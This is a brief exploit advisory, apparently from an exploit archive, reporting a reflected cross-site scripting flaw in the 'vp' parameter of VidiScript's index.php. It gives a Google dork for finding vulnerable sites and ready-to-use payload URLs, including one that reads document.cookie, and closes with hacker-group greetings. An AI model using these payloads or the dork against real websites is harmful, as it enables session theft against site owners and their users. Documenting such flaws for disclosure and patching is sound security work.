VidiScript suffers from a cross site scripting vulnerability.
68a5335459a59d5b0ae336b2b97a852ea61feab369f515e4fb01e58d1c584f83
##########################################################
# Exploit Title: VidiScript (index.php) Cross Site Scripting
# home : http://www.D99Y.com
# Author: NassRawI
# Date: 2/3/2011
# Google Dork: "Powered By VidiScript.com"
# Software Link: http://www.vidiscript.com/
##########################################################
#
# file :
#
# index.php
#
# exploit :
#
# http://localhost/index.php?vp= [ XSS ]
#
# http://localhost/index.php?vp=<script>alert(12345)</script>
#
# http://localhost/index.php?vp=<script>alert(document.cookie)</script>
#
##########################################################
Greetz :
D99Y Team + alroo7 alte no tkda3 + moot almsh3er + mahmoudvip + anT!-Tr0J4n < RaDetha Lma Fthet :$
Difficult 511 and all members D99Y.CoM
Enjoy :)